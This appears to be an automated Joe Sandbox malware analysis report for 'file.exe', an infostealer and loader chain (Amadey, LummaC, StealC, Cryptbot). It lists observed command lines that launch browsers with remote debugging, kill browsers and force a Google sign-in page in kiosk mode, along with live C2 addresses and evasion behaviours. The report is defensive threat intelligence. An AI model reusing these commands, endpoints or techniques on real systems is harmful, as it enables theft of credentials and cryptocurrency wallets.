Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559251
MD5:7a3b3989f1f3647dc9188a185b345d43
SHA1:475a5d5e48c0f25f8083ff7657e9d6958e39d2ad
SHA256:749a24775a9225dd27ed9d457d9a82ace5122cdcaaef5069ae3e802464e2c77b
Tags:exeuser-Bitsight
Infos:

Detection

PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Detected PureCrypter Trojan
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies windows update settings
Monitors registry run keys for changes
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7A3B3989F1F3647DC9188A185B345D43)
    • chrome.exe (PID: 2328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 3524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2176,i,8591507833336824045,10004583078600035240,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 8180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 7768 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2160,i,16259966090051703333,16306138306425127585,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • cmd.exe (PID: 9168 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKJEGCFBGDH.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 9176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • DocumentsKJEGCFBGDH.exe (PID: 6736 cmdline: "C:\Users\user\DocumentsKJEGCFBGDH.exe" MD5: 8016C72A6E4BF40375E31E867F487FA7)
        • skotes.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 8016C72A6E4BF40375E31E867F487FA7)
          • 824db60d2b.exe (PID: 6984 cmdline: "C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe" MD5: E0DAF3617F84AF41981769A31ED23565)
            • chrome.exe (PID: 5268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
              • chrome.exe (PID: 4972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 --field-trial-handle=2536,i,9557238396092127338,18166861016205236946,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • 8eeb449c35.exe (PID: 9052 cmdline: "C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe" MD5: C295093AA18965205A72349F476A9CF3)
          • 241fdb96f6.exe (PID: 8452 cmdline: "C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe" MD5: 7A3B3989F1F3647DC9188A185B345D43)
          • 846d486827.exe (PID: 7752 cmdline: "C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe" MD5: 68D659F5943261E1EF96EF4BF5EE50A0)
            • taskkill.exe (PID: 7944 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 8172 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 6360 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 4176 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 6416 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 4372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • firefox.exe (PID: 4344 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • fb696bafb5.exe (PID: 3492 cmdline: "C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe" MD5: 17953500D9B941E5D42EA7121ADAADC8)
  • msedge.exe (PID: 6828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 3660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6904 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8240 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7068 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8384 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7560 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8416 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7560 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 7788 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • skotes.exe (PID: 6952 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 8016C72A6E4BF40375E31E867F487FA7)
  • 8eeb449c35.exe (PID: 5932 cmdline: "C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe" MD5: C295093AA18965205A72349F476A9CF3)
  • firefox.exe (PID: 6096 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 5552 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 4908 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20230927232528 -prefsHandle 2236 -prefMapHandle 2228 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b999cfbb-84d7-46b4-b70e-5bcaa2d69c0e} 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 23758770b10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 7952 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4208 -parentBuildID 20230927232528 -prefsHandle 4232 -prefMapHandle 4228 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7cd98799-25dd-4122-971c-e59e60cd92e0} 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 2376ab5bd10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • 241fdb96f6.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe" MD5: 7A3B3989F1F3647DC9188A185B345D43)
  • 846d486827.exe (PID: 5760 cmdline: "C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe" MD5: 68D659F5943261E1EF96EF4BF5EE50A0)
    • taskkill.exe (PID: 6932 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PureCrypterAccording to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: LummaC

{"C2 url": ["peepburry828.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "processhol.sbs", "p10tgrace.sbs"], "Build id": "LOGS11--LiveTraffic"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_CryptbotYara detected CryptbotJoe Security
    dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000021.00000003.3029423609.00000000011FD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000021.00000003.3141958097.00000000011F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000001C.00000003.2922185232.0000000000CE3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialFlusherYara detected Credential FlusherJoe Security
              00000015.00000002.2653034486.0000000000991000.00000040.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0000001A.00000003.2894414344.0000000005820000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                  Click to see the 37 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  23.2.skotes.exe.460000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    21.2.DocumentsKJEGCFBGDH.exe.990000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7532, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8eeb449c35.exe
                      Sigma detected: Browser Started with Remote Debugging
                      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5740, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 2328, ProcessName: chrome.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7532, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8eeb449c35.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:17.728133+010020283713Unknown Traffic192.168.2.650116188.114.96.3443TCP
                      2024-11-20T10:55:19.032182+010020283713Unknown Traffic192.168.2.650118188.114.96.3443TCP
                      2024-11-20T10:55:20.930211+010020283713Unknown Traffic192.168.2.650120188.114.96.3443TCP
                      2024-11-20T10:55:23.542467+010020283713Unknown Traffic192.168.2.650122188.114.96.3443TCP
                      2024-11-20T10:55:25.131468+010020283713Unknown Traffic192.168.2.650125188.114.96.3443TCP
                      2024-11-20T10:55:26.847570+010020283713Unknown Traffic192.168.2.650126188.114.96.3443TCP
                      2024-11-20T10:55:30.089762+010020283713Unknown Traffic192.168.2.650133188.114.96.3443TCP
                      2024-11-20T10:55:33.359020+010020283713Unknown Traffic192.168.2.650137188.114.96.3443TCP
                      2024-11-20T10:55:35.102609+010020283713Unknown Traffic192.168.2.650141188.114.96.3443TCP
                      2024-11-20T10:55:35.277689+010020283713Unknown Traffic192.168.2.650142188.114.96.3443TCP
                      2024-11-20T10:55:38.176683+010020283713Unknown Traffic192.168.2.650153188.114.96.3443TCP
                      2024-11-20T10:55:42.002164+010020283713Unknown Traffic192.168.2.650159188.114.96.3443TCP
                      2024-11-20T10:55:48.080325+010020283713Unknown Traffic192.168.2.650167188.114.96.3443TCP
                      2024-11-20T10:55:51.975773+010020283713Unknown Traffic192.168.2.650171188.114.96.3443TCP
                      2024-11-20T10:55:59.298849+010020283713Unknown Traffic192.168.2.650176188.114.96.3443TCP
                      2024-11-20T10:56:01.810798+010020283713Unknown Traffic192.168.2.650178188.114.96.3443TCP
                      2024-11-20T10:56:54.421612+010020283713Unknown Traffic192.168.2.65241420.42.65.92443TCP
                      2024-11-20T10:59:07.611967+010020283713Unknown Traffic192.168.2.65249652.182.143.214443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:18.412462+010020546531A Network Trojan was detected192.168.2.650116188.114.96.3443TCP
                      2024-11-20T10:55:19.458399+010020546531A Network Trojan was detected192.168.2.650118188.114.96.3443TCP
                      2024-11-20T10:55:34.305057+010020546531A Network Trojan was detected192.168.2.650137188.114.96.3443TCP
                      2024-11-20T10:55:35.516011+010020546531A Network Trojan was detected192.168.2.650141188.114.96.3443TCP
                      2024-11-20T10:55:35.701448+010020546531A Network Trojan was detected192.168.2.650142188.114.96.3443TCP
                      2024-11-20T10:56:02.262951+010020546531A Network Trojan was detected192.168.2.650178188.114.96.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:18.412462+010020498361A Network Trojan was detected192.168.2.650116188.114.96.3443TCP
                      2024-11-20T10:55:34.305057+010020498361A Network Trojan was detected192.168.2.650137188.114.96.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:19.458399+010020498121A Network Trojan was detected192.168.2.650118188.114.96.3443TCP
                      2024-11-20T10:55:35.516011+010020498121A Network Trojan was detected192.168.2.650141188.114.96.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:36.848000+010020197142Potentially Bad Traffic192.168.2.650150185.215.113.1680TCP
                      2024-11-20T10:56:03.017499+010020197142Potentially Bad Traffic192.168.2.650179185.215.113.1680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:12.398878+010020446961A Network Trojan was detected192.168.2.650112185.215.113.4380TCP
                      2024-11-20T10:55:17.846326+010020446961A Network Trojan was detected192.168.2.650115185.215.113.4380TCP
                      2024-11-20T10:55:23.269436+010020446961A Network Trojan was detected192.168.2.650121185.215.113.4380TCP
                      2024-11-20T10:55:28.100943+010020446961A Network Trojan was detected192.168.2.650127185.215.113.4380TCP
                      2024-11-20T10:55:34.192439+010020446961A Network Trojan was detected192.168.2.650138185.215.113.4380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:29.180902+010020543501A Network Trojan was detected192.168.2.65013234.116.198.13080TCP
                      2024-11-20T10:55:31.239682+010020543501A Network Trojan was detected192.168.2.65013434.116.198.13080TCP
                      2024-11-20T10:55:40.182147+010020543501A Network Trojan was detected192.168.2.65015534.116.198.13080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:54:19.202717+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.649742TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:54:19.195496+010020442441Malware Command and Control Activity Detected192.168.2.649742185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:54:19.419719+010020442461Malware Command and Control Activity Detected192.168.2.649742185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:54:20.409290+010020442481Malware Command and Control Activity Detected192.168.2.649742185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:54:19.436766+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.649742TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:24.198084+010020480941Malware Command and Control Activity Detected192.168.2.650122188.114.96.3443TCP
                      2024-11-20T10:55:59.304071+010020480941Malware Command and Control Activity Detected192.168.2.650176188.114.96.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:54:18.975704+010020442431Malware Command and Control Activity Detected192.168.2.649742185.215.113.20680TCP
                      2024-11-20T10:55:25.351916+010020442431Malware Command and Control Activity Detected192.168.2.650124185.215.113.20680TCP
                      2024-11-20T10:55:49.772105+010020442431Malware Command and Control Activity Detected192.168.2.650169185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:03.007560+010028561471A Network Trojan was detected192.168.2.650108185.215.113.4380TCP
                      2024-11-20T11:00:17.313489+010028561471A Network Trojan was detected192.168.2.652538185.215.113.4380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:11.683546+010028561221A Network Trojan was detected185.215.113.4380192.168.2.650109TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:06.050003+010028033053Unknown Traffic192.168.2.65011031.41.244.1180TCP
                      2024-11-20T10:55:13.170019+010028033053Unknown Traffic192.168.2.650113185.215.113.1680TCP
                      2024-11-20T10:55:18.584883+010028033053Unknown Traffic192.168.2.650117185.215.113.1680TCP
                      2024-11-20T10:55:24.057373+010028033053Unknown Traffic192.168.2.650123185.215.113.1680TCP
                      2024-11-20T10:55:28.826550+010028033053Unknown Traffic192.168.2.650131185.215.113.1680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:54:20.654869+010028033043Unknown Traffic192.168.2.649742185.215.113.20680TCP
                      2024-11-20T10:54:40.470065+010028033043Unknown Traffic192.168.2.649910185.215.113.20680TCP
                      2024-11-20T10:54:41.656643+010028033043Unknown Traffic192.168.2.649910185.215.113.20680TCP
                      2024-11-20T10:54:42.330939+010028033043Unknown Traffic192.168.2.649910185.215.113.20680TCP
                      2024-11-20T10:54:42.938304+010028033043Unknown Traffic192.168.2.649910185.215.113.20680TCP
                      2024-11-20T10:54:44.690317+010028033043Unknown Traffic192.168.2.649910185.215.113.20680TCP
                      2024-11-20T10:54:45.139081+010028033043Unknown Traffic192.168.2.649910185.215.113.20680TCP
                      2024-11-20T10:54:49.490507+010028033043Unknown Traffic192.168.2.650048185.215.113.1680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:55:30.148618+010028438641A Network Trojan was detected192.168.2.650133188.114.96.3443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: file.exeAvira: detected
                      Found malware configuration
                      Source: 00000015.00000002.2653034486.0000000000991000.00000040.00000001.01000000.0000000B.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                      Source: 8eeb449c35.exe.9052.25.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["peepburry828.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "processhol.sbs", "p10tgrace.sbs"], "Build id": "LOGS11--LiveTraffic"}
